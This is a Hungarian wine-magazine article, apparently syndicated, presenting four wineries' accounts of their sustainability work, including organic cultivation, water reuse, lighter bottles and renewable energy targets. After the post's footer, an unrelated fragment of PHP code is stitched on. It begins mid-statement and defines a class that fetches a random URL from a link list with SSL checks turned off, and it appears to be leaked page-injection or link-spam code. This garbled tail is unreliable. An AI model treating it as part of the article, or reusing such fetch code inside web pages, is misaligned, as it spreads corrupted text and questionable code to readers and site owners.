4 pozitív példa arra, hogyan óvhatják környezetüket a borászatok

A The Drinks Business a világ minden tájáról borászokat, illetve borászatok munkatársait kérdezte meg arról, mit tesznek a fenntarthatóság érdekében, mennyire működnek környezettudatosan. Most négy pozitív példát olvashatnak ezek közül! Fotó: La Riojana Pedro Salguero, a Bodega Ijalba főborásza (Spanyolország) „Az a célunk, hogy védjük és megőrizzük környezetünk, a Rioja borvidék értékeit. Éppen ezért 1998-ban... View Article


A The Drinks Business a világ minden tájáról borászokat, illetve borászatok munkatársait kérdezte meg arról, mit tesznek a fenntarthatóság érdekében, mennyire működnek környezettudatosan. Most négy pozitív példát olvashatnak ezek közül!

Fotó: La Riojana

Pedro Salguero, a Bodega Ijalba főborásza (Spanyolország)

„Az a célunk, hogy védjük és megőrizzük környezetünk, a Rioja borvidék értékeit. Éppen ezért 1998-ban mi voltunk az első hivatalosan is elismert organikus borászat ezen a borvidéken. A szőlészetben használt vizet összegyűjtjük, megtisztítjuk, ezt használjuk az ültetvényen, és ezzel hűtjük a tartályokat a fermentálás alatt. A metszéskor levágott szárakat komposztként használjuk, a karbonlábnyomunkat pedig azáltal is csökkentjük, hogy könnyebb üvegekbe palackozzuk a borainkat, valamint az egyéb csomagolóanyagok súlyát is mérsékeljük.”

Johan Delport, a Waverley Hills főborásza (Dél-Afrika)

„A Waverley Hills már évek óta élen jár a fenntartható és organikus gazdálkodás terén, és magas minőségben készít organikus borokat. Dél-Afrika nyugati felén, a Tulbagh-völgyben 550 mm eső esik évente, ezért hét évvel ezelőtt a birtok beszállt egy öntözővíz-megőrző programba. Ennek lényege, hogy másfél méteres sávokban ponyvákat terítünk a földre, a szőlőtőkék alá, a szélükre földet szórunk, hogy ne fújja el őket a szél. Ez blokkolja a napsugarakat, és gátolja a fű növekedését a tövek között. Az anyag áteresztőképessége engedi, hogy a víz bejusson a földbe, és táplálja a szőlőtőkék gyökereit, ám mivel a ponyva gátolja a párolgást, a föld nedves és hűvös marad. Ez a projekt nagyon fontos újítás volt a dél-afrikai borpiac számára.”

Anna Bousquet, a Domaine Bousquet tulajdonosa és vezérigazgatója (Chile)

„A fenntarthatósághoz a környezetünkben élő közösség tisztes megélhetése is hozzátartozik. Amikor a chilei Tupungatóban telepedtünk le, a környék isten háta mögöttinek számított. Ezért csatlakoztunk a helyi borászatok együttműködéséhez, mely egy új út építését támogattuk. Ez megkönnyítette a szállítást és a borászat megközelítését is az alkalmazottak számára, valamint hozzájárult a hozzánk érkező turisták számának növekedéséhez.

Nem használunk vegyszereket, csak természetes trágyát, beleértve a saját komposztunkat is. Szintén ügyelünk a vízhiányra: nagy összegeket fektettünk víztisztító berendezésekbe, hogy minimalizáljuk a vízfelhasználásunkat és újra hasznosítsuk a vizet az öntözéshez.

Ezenkívül kizárólag könnyű üveget használunk a teljes kínálatunk palackozásához. Számunkra soha nem marketingfogás volt az organikus gazdálkodás, a termékek 100%-ban organikusan készülnek.”

Valentina Lira, a Concha y Toro fenntarthatósággal foglalkozó menedzsere (Chile)

„2012-ban a Concha y Toro kifejlesztett egy fenntarthatósági stratégiát, amely hat pilléren alapul: ellátási lánc, termék, partnerek, emberek, társadalom és környezet. A cég azt a célt tűzte ki, hogy 2020-ra 100 százalékban megújuló energiát használjon. Tavaly az energiaellátás 73 százalékát fedezte megújuló energia.

A társadalmi felelősségvállalás jegyében a Concha y Toro egy új kezdeményezést indított útjára, hogy a vállalkozó szellemet támogassa. Az együttműködés keretében a start-up-vállalkozások a Concha y Toro tapasztalataira támaszkodva dolgozhatnak ki életképes megoldásokat a problémáikra.”

Forrás: The Drinks Business

December-januári duplaszámunkban Romsics László cikkét olvashatják az organikus szőlőtermesztés irányzatairól.

No visits yet

The post 4 pozitív példa arra, hogyan óvhatják környezetüket a borászatok appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>